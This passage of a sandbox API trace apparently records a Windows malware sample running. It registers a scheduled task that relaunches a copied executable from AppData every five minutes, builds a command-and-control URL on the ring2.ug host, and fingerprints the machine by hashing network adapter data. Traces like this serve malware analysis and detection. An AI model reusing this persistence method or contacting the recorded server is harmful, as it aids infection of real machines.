varVal1=0x67, varVal2=0x7), password=0x18da08*(varType=0x0, wReserved1=0x323, wReserved2=0xdef4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x610000)) returned 0x0 [0108.738] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc60 [0108.738] TaskScheduler:ITaskService:GetFolder (in: This=0x2900888, Path="\\", ppFolder=0x18df54 | out: ppFolder=0x18df54*=0x29008f0) returned 0x0 [0108.739] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc60 | out: hHeap=0x610000) returned 1 [0108.739] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc60 [0108.739] ITaskFolder:DeleteTask (This=0x29008f0, Name="Time Trigger Task", flags=0) returned 0x0 [0108.974] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc60 | out: hHeap=0x610000) returned 1 [0108.974] TaskScheduler:ITaskService:NewTask (in: This=0x2900888, flags=0x0, ppDefinition=0x18df58 | out: ppDefinition=0x18df58*=0x2900958) returned 0x0 [0108.974] TaskScheduler:IUnknown:Release (This=0x2900888) returned 0x1 [0108.974] ITaskDefinition:get_RegistrationInfo (in: This=0x2900958, ppRegistrationInfo=0x18df2c | out: ppRegistrationInfo=0x18df2c*=0x2900a18) returned 0x0 [0108.974] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.974] IRegistrationInfo:put_Author (This=0x2900a18, Author="Author Name") returned 0x0 [0108.975] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.975] IUnknown:Release (This=0x2900a18) returned 0x1 [0108.975] ITaskDefinition:get_Principal (in: This=0x2900958, ppPrincipal=0x18df34 | out: ppPrincipal=0x18df34*=0x2900ba8) returned 0x0 [0108.975] IPrincipal:put_LogonType (This=0x2900ba8, LogonType=3) returned 0x0 [0108.975] IUnknown:Release (This=0x2900ba8) returned 0x1 [0108.975] ITaskDefinition:get_Settings (in: This=0x2900958, ppSettings=0x18df3c | out: ppSettings=0x18df3c*=0x2900ac8) returned 0x0 [0108.975] ITaskSettings:put_StartWhenAvailable (This=0x2900ac8, StartWhenAvailable=1) returned 0x0 [0108.975] IUnknown:Release (This=0x2900ac8) returned 0x1 [0108.975] ITaskSettings:get_IdleSettings (in: This=0x2900ac8, ppIdleSettings=0x18df20 | out: ppIdleSettings=0x18df20*=0x2900b38) returned 0x0 [0108.975] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.975] IIdleSettings:put_WaitTimeout (This=0x2900b38, WaitTimeout="PT5M") returned 0x0 [0108.975] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.975] IUnknown:Release (This=0x2900b38) returned 0x1 [0108.975] ITaskDefinition:get_Triggers (in: This=0x2900958, ppTriggers=0x18df1c | out: ppTriggers=0x18df1c*=0x2900a88) returned 0x0 [0108.976] ITriggerCollection:Create (in: This=0x2900a88, Type=1, ppTrigger=0x18df28 | out: ppTrigger=0x18df28*=0x2900c08) returned 0x0 [0108.976] IUnknown:Release (This=0x2900a88) returned 0x1 [0108.976] IUnknown:QueryInterface (in: This=0x2900c08, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18df44 | out: ppvObject=0x18df44*=0x2900c08) returned 0x0 [0108.976] IUnknown:Release (This=0x2900c08) returned 0x2 [0108.976] ITrigger:get_Repetition (in: This=0x2900c08, ppRepeat=0x18df30 | out: ppRepeat=0x18df30*=0x2900c58) returned 0x0 [0108.976] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.976] IRepetitionPattern:put_Interval (This=0x2900c58, Interval="PT5M") returned 0x0 [0108.976] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.976] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.976] IRepetitionPattern:put_Duration (This=0x2900c58, Duration="") returned 0x0 [0108.976] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.976] ITrigger:put_Repetition (This=0x2900c08, Repetition=0x2900c58) returned 0x0 [0108.976] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.976] ITrigger:put_Id (This=0x2900c08, Id="Trigger1") returned 0x0 [0108.976] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.976] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.977] ITrigger:put_EndBoundary (This=0x2900c08, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0108.977] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18da04 | out: lpSystemTimeAsFileTime=0x18da04*(dwLowDateTime=0x9a4d42c0, dwHighDateTime=0x1d5d833)) [0108.983] GetLastError () returned 0x0 [0108.983] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x3254880 [0108.983] GetLastError () returned 0x0 [0108.983] GetLastError () returned 0x0 [0108.983] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0108.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d96c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d96c) returned 26 [0108.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d96c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d96c) returned 26 [0108.985] GetLastError () returned 0x0 [0108.985] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x3254700 [0108.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x3254700, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0108.985] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa0) returned 0x6ac608 [0108.985] GetLastError () returned 0x0 [0108.985] ITrigger:put_StartBoundary (This=0x2900c08, StartBoundary="2020-02-01T00:00:52") returned 0x0 [0108.986] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.986] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321eca8 | out: hHeap=0x610000) returned 1 [0108.986] IUnknown:Release (This=0x2900c08) returned 0x1 [0108.986] ITaskDefinition:get_Actions (in: This=0x2900958, ppActions=0x18df38 | out: ppActions=0x18df38*=0x29009d0) returned 0x0 [0108.986] IActionCollection:Create (in: This=0x29009d0, Type=0, ppAction=0x18df24 | out: ppAction=0x18df24*=0x2900ca0) returned 0x0 [0108.986] IUnknown:Release (This=0x29009d0) returned 0x1 [0108.986] IUnknown:QueryInterface (in: This=0x2900ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18df40 | out: ppvObject=0x18df40*=0x2900ca0) returned 0x0 [0108.986] IUnknown:Release (This=0x2900ca0) returned 0x2 [0108.986] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.986] IExecAction:put_Path (This=0x2900ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned 0x0 [0108.986] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.986] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.986] IExecAction:put_Arguments (This=0x2900ca0, Arguments="--Task") returned 0x0 [0108.986] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0108.986] IUnknown:Release (This=0x2900ca0) returned 0x1 [0108.986] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x321dc90 [0108.987] ITaskFolder:RegisterTaskDefinition (in: This=0x29008f0, Path="Time Trigger Task", pDefinition=0x2900958, flags=6, UserId=0x18d9e0*(varType=0x0, wReserved1=0x323, wReserved2=0xdef4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x610000), password=0x18d9f0*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18da04*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18df0c | out: ppTask=0x18df0c*=0x2900d20) returned 0x0 [0109.060] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x321dc90 | out: hHeap=0x610000) returned 1 [0109.060] TaskScheduler:IUnknown:Release (This=0x29008f0) returned 0x0 [0109.060] TaskScheduler:IUnknown:Release (This=0x2900958) returned 0x0 [0109.061] IUnknown:Release (This=0x2900d20) returned 0x0 [0109.061] CoUninitialize () [0109.062] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x31e2728 | out: hHeap=0x610000) returned 1 [0109.062] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x31e24a0 | out: hHeap=0x610000) returned 1 [0109.062] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x31e22f0 | out: hHeap=0x610000) returned 1 [0109.062] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6640d8 [0109.063] OpenServiceW (hSCManager=0x6640d8, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x3213b90 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x32328a8 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3232208 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3232d48 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3232fb0 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3233218 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x321eca8 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x32575d0 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3257838 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3257aa0 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3257d08 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3257f70 [0109.063] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x32581d8 [0109.064] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3258440 [0109.064] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x32586a8 [0109.064] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3258910 [0109.064] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3258b78 [0109.064] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa0) returned 0x6ac608 [0109.064] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x100) returned 0x641210 [0109.064] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6ac608 | out: hHeap=0x610000) returned 1 [0109.064] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x100) returned 0x3232470 [0109.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x322ecb0, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x93c) returned 0x5b0 [0109.320] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x641210 | out: hHeap=0x610000) returned 1 [0109.320] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x3254700 [0109.320] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3258de0 [0109.320] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3259048 [0109.320] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x32592b0 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3259518 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3259780 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x32599e8 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3259c50 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x3259eb8 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x325a120 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x25c) returned 0x325a388 [0109.321] lstrlenA (lpString="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned 51 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x6eb330 [0109.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3258de0, cbMultiByte=-1, lpWideCharStr=0x6eb330, cchWideChar=52 | out: lpWideCharStr="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned 52 [0109.321] lstrcatW (in: lpString1="", lpString2="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.321] lstrlenA (lpString="") returned 0 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f290 [0109.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3259048, cbMultiByte=-1, lpWideCharStr=0x70f290, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.321] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.321] lstrlenA (lpString="") returned 0 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f260 [0109.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32592b0, cbMultiByte=-1, lpWideCharStr=0x70f260, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.321] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.321] lstrlenA (lpString="") returned 0 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f300 [0109.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3259518, cbMultiByte=-1, lpWideCharStr=0x70f300, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.321] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.321] lstrlenA (lpString="") returned 0 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f2b0 [0109.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3259780, cbMultiByte=-1, lpWideCharStr=0x70f2b0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.321] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.321] lstrlenA (lpString="") returned 0 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f2c0 [0109.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32599e8, cbMultiByte=-1, lpWideCharStr=0x70f2c0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.321] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.321] lstrlenA (lpString="") returned 0 [0109.321] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f320 [0109.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3259c50, cbMultiByte=-1, lpWideCharStr=0x70f320, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.322] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.322] lstrlenA (lpString="") returned 0 [0109.322] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f2d0 [0109.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3259eb8, cbMultiByte=-1, lpWideCharStr=0x70f2d0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.322] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.322] lstrlenA (lpString="") returned 0 [0109.322] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f2e0 [0109.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x325a120, cbMultiByte=-1, lpWideCharStr=0x70f2e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.322] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.322] lstrlenA (lpString="") returned 0 [0109.322] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x2) returned 0x70f2f0 [0109.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x325a388, cbMultiByte=-1, lpWideCharStr=0x70f2f0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0109.322] lstrcatW (in: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php", lpString2="" | out: lpString1="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php") returned="http://ring2.ug/As73yhsyU34578hxxx1/SDf565g/get.php" [0109.322] lstrlenW (lpString="") returned 0 [0109.322] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x635610 [0109.322] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x288) returned 0x321ef10 [0109.322] GetAdaptersInfo (in: AdapterInfo=0x321ef10, SizePointer=0x18df24 | out: AdapterInfo=0x321ef10, SizePointer=0x18df24) returned 0x0 [0109.363] GetAdaptersInfo (in: AdapterInfo=0x321ef10, SizePointer=0x18df24 | out: AdapterInfo=0x321ef10, SizePointer=0x18df24) returned 0x0 [0109.430] GetLastError () returned 0x0 [0109.437] GetLastError () returned 0x0 [0109.437] CryptAcquireContextW (in: phProv=0x18def4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18def4*=0x66ec38) returned 1 [0109.476] CryptCreateHash (in: hProv=0x66ec38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18defc | out: phHash=0x18defc) returned 1 [0109.476] CryptHashData (hHash=0x323cb90, pbData=0x325bd50, dwDataLen=0x11, dwFlags=0x0) returned 1 [0109.476] CryptGetHashParam (in: hHash=0x323cb90, dwParam=0x2, pbData=0x0, pdwDataLen=0x18def8, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18def8) returned 1 [0109.476] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x11) returned 0x3202dd0 [0109.476] CryptGetHashParam (in: hHash=0x323cb90, dwParam=0x2, pbData=0x3202dd0, pdwDataLen=0x18def8, dwFlags=0x0 | out: pbData=0x3202dd0, pdwDataLen=0x18def8) returned 1 [0109.476] GetLastError () returned 0x0 [0109.476] CryptDestroyHash (hHash=0x323cb90) returned 1 [0109.476] CryptReleaseContext (hProv=0x66ec38, dwFlags=0x0) returned 1 [0109.476] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x325bd50 | out: hHeap=0x610000) returned 1 [0109.476] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320f098 [0109.476] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x320f060 | out: hHeap=0x610000) returned 1 [0109.476] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x664178 | out: hHeap=0x610000) returned 1 [0109.476] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x94c) returned 0x5cc [0109.734] WaitForSingleObject (hHandle=0x5cc, dwMilliseconds=0xffffffff) Thread: id = 33 os_tid = 0x8a4 Thread: id = 34 os_tid = 0x8b4 Thread: id = 35 os_tid = 0x8c4 Thread: id = 36 os_tid = 0x8d4 Thread: id = 37 os_tid = 0x8e4 Thread: id = 38 os_tid = 0x8fc Thread: id = 39 os_tid = 0x90c Thread: id = 40 os_tid = 0x92c Thread: id = 41 os_tid = 0x93c [0109.334] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x100) returned 0x641210 [0109.334] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x100) returned 0x3233480 [0109.334] GetLastError () returned 0x54f [0109.334] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3bc) returned 0x3222e00 [0109.334] GetCurrentThreadId () returned 0x93c [0109.334] SetLastError (dwErrCode=0x54f) [0109.334] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320ee30 [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x3202dd0 [0109.335] GetLastError () returned 0x54f [0109.335] SetLastError (dwErrCode=0x54f) [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320ec38 [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320ebc8 [0109.335] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3202dd0 | out: hHeap=0x610000) returned 1 [0109.335] GetLastError () returned 0x54f [0109.335] SetLastError (dwErrCode=0x54f) [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320ea78 [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x48) returned 0x3242ae0 [0109.335] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x320ebc8 | out: hHeap=0x610000) returned 1 [0109.335] GetLastError () returned 0x54f [0109.335] SetLastError (dwErrCode=0x54f) [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320ebc8 [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x6eca30 [0109.335] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3242ae0 | out: hHeap=0x610000) returned 1 [0109.335] GetLastError () returned 0x54f [0109.335] SetLastError (dwErrCode=0x54f) [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320eb58 [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x90) returned 0x665798 [0109.335] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6eca30 | out: hHeap=0x610000) returned 1 [0109.335] GetLastError () returned 0x54f [0109.335] SetLastError (dwErrCode=0x54f) [0109.335] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320ee68 [0109.335] GetLastError () returned 0x54f [0109.335] SetLastError (dwErrCode=0x54f) [0109.335] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3233480 | out: hHeap=0x610000) returned 1 [0109.335] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0109.336] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0109.336] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x400) returned 0x32231c8 [0109.336] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x32231c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0109.336] UuidCreate (in: Uuid=0x9a9d768 | out: Uuid=0x9a9d768) returned 0x0 [0109.364] UuidToStringA (in: Uuid=0x9a9d768, StringUuid=0x9a9d6c0 | out: StringUuid=0x9a9d6c0) returned 0x0 [0109.364] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x320edc0 [0109.364] RpcStringFreeA (in: String=0x9a9d6c0 | out: String=0x9a9d6c0) returned 0x0 [0109.364] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="d0d3e004-7994-4796-b820-07878416e5d7" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\d0d3e004-7994-4796-b820-07878416e5d7") returned 1 [0109.365] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\d0d3e004-7994-4796-b820-07878416e5d7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\d0d3e004-7994-4796-b820-07878416e5d7"), lpSecurityAttributes=0x0) returned 1 [0109.365] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x410) returned 0x32235d0 [0109.365] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x410) returned 0x3217b58 [0109.365] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1000) returned 0x3217f70 [0109.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3217b58, cbMultiByte=-1, lpWideCharStr=0x3217f70, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\d0d3e004-7994-4796-b820-07878416e5d7") returned 81 [0109.365] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1010) returned 0x3266f80 [0109.366] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3217f70 | out: hHeap=0x610000) returned 1 [0109.366] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x3217b58 | out: hHeap=0x610000) returned 